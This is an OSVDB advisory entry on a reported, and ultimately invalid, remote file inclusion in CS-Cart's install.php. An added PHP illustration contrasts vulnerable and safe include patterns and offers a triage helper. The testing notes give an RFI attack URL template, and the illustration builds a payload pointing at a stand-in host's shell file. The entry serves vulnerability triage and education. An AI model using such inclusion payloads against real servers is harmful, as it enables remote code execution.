CS-Cart install.php install_dir Variable Remote File Inclusion

2007-01-09T17:32:42
ID OSVDB:31277
Type osvdb
Reporter OSVDB
Modified 2007-01-09T17:32:42

Description

Vulnerability Description

CS-Cart has been reported to contain a flaw that may allow a remote attacker to execute arbitrary code. The report claims that install.php builds an include path from the 'install_dir' variable without sanitizing user-supplied input, so that a remote file could be pulled in via the query string. However, subsequent examination shows that the script assigns 'install_dir' itself before any request-supplied value could influence it; the parameter in the reported URL never reaches the include, and the issue is not exploitable.

Solution Description

The reported vulnerability is not valid: 'install_dir' is set by the script before it is used, so no fix is required.

Short Description

CS-Cart install.php was reported to allow remote file inclusion through the 'install_dir' variable; subsequent examination found the variable is assigned by the script before an attacker can influence it, so the report is invalid.

Manual Testing Notes

http://[target]/[CS-Cart_path]/install.php?install_dir=[evil_scripts]
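The distinction OSVDB draws here (an include path that really is driven by request data versus one where the script assigns the variable itself before use) is easy to see in miniature. The following is an added illustration, not CS-Cart code and not taken from the original report. It assumes the report relied on register_globals, or an equivalent extract($_GET), to turn the ?install_dir= parameter above into a PHP variable; the payload string and the two source fragments fed to the triage helper are constructed for the example.

```php
<?php
// Added example, not CS-Cart code. Shows why a URL like
// install.php?install_dir=... is only a remote file inclusion when the
// script never assigns the variable itself before using it in include().
// Assumption: the report depended on register_globals (or extract($_GET))
// to turn the query-string key into $install_dir.

// What register_globals did at request start: every query-string key became
// a global variable before the first line of the script ran.
function register_globals(array $query): array
{
    return $query;   // the script's variable table, seeded from the request
}

// Pattern A (a real RFI): the script uses $install_dir without ever
// assigning it, so the request-seeded value reaches include().
function pattern_a(array $globals): string
{
    $install_dir = $globals['install_dir'] ?? '.';
    $path = $install_dir . '/install/config.php';
    // include($path);  // with allow_url_include this fetches the remote URL
    return $path;
}

// Pattern B (what OSVDB found in install.php): the script assigns
// $install_dir unconditionally before it is used. Whatever register_globals
// put there is overwritten, so the request value is dead.
function pattern_b(array $globals): string
{
    $install_dir = $globals['install_dir'] ?? '.';  // value register_globals set
    $install_dir = __DIR__;                         // overwritten by the script
    $path = $install_dir . '/install/config.php';
    // include($path);  // always local
    return $path;
}

// Triage helper for a report like this one: in the script source, does an
// unconditional assignment to the variable appear before its first use in
// an include/require? Line-based and heuristic, but enough to confirm or
// reject a claim before reading the whole file.
function assigned_before_include(string $source, string $var): bool
{
    $v = preg_quote($var, '/');
    foreach (preg_split('/\R/', $source) as $line) {
        if (preg_match('/^\s*' . $v . '\s*=[^=]/', $line)) {
            return true;    // assignment reached first
        }
        if (preg_match('/\b(include|require)(_once)?\b.*' . $v . '/', $line)) {
            return false;   // include reached first
        }
    }
    return false;           // variable never used in an include at all
}

// Constructed payload modelled on the tested URL.
$globals = register_globals(['install_dir' => 'http://evil.example/shell.txt?']);
echo "Pattern A would include: ", pattern_a($globals), "\n";
echo "Pattern B would include: ", pattern_b($globals), "\n";

// Constructed source fragments standing in for the two install.php shapes.
$vulnerable_src = "<?php\ninclude(\$install_dir . '/install/config.php');\n";
$safe_src       = "<?php\n\$install_dir = dirname(__FILE__);\n"
                . "include(\$install_dir . '/install/config.php');\n";
var_dump(assigned_before_include($vulnerable_src, '$install_dir'));
var_dump(assigned_before_include($safe_src, '$install_dir'));
```

When verifying a register_globals-era RFI report, the question is not whether the variable name appears in an include() but whether anything the request controls is still in that variable at the moment the include runs; a grep for the assignment, as the helper above does, settles most such reports in seconds.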

References:

Vendor URL: http://www.cs-cart.com/
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0284.html
Mail List Post: http://attrition.org/pipermail/vim/2007-January/001223.html
Mail List Post: http://www.securityfocus.com/archive/1/archive/1/456527/100/0/threaded
ISS X-Force ID: 31408
CVE-2007-0230